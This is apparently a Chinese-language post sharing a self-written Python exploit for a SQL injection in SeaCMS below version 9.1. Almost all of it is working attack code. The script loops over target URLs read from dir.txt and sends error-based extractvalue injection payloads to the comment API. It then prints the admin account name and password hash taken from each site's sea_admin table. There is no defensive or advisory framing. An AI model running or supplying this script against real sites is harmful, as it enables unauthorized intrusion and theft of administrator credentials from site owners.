自己写的Seacms漏洞利用脚本
SeaCMS V9.1以下版本SQL注入漏洞
获取管理员表的第一个用户的账号和管理员表中第一个用户的密码的md5值
需要在脚本的同级目录新建一个dir.txt里面存放网址
#SeaCMS #Author:Root import requests import time import re dir = open('dir.txt','r') for i in dir: try: print(time.strftime('%Y-%m-%d %H:%M:%S')) url = i.strip('\n')+"/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`" url2 = i.strip('\n')+"/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`" s = requests.session() a = s.get(url,timeout=10) b = s.get(url2,timeout=10) view = a.text view2 = b.text pw = "".join(re.findall("XPATH syntax error: '\\\\ (.*?)\' <",view)) name = "".join(re.findall("XPATH syntax error: '\\\\ (.*?)\' <",view2)) if(pw and name): print("[*]Success! "+i.strip('\n')) print("[*]AdminName: "+name) print("[*]AdminPass: "+pw+'\n') else: print("[*]We found nothing in "+i) except: print("[*]Cannot connect "+i)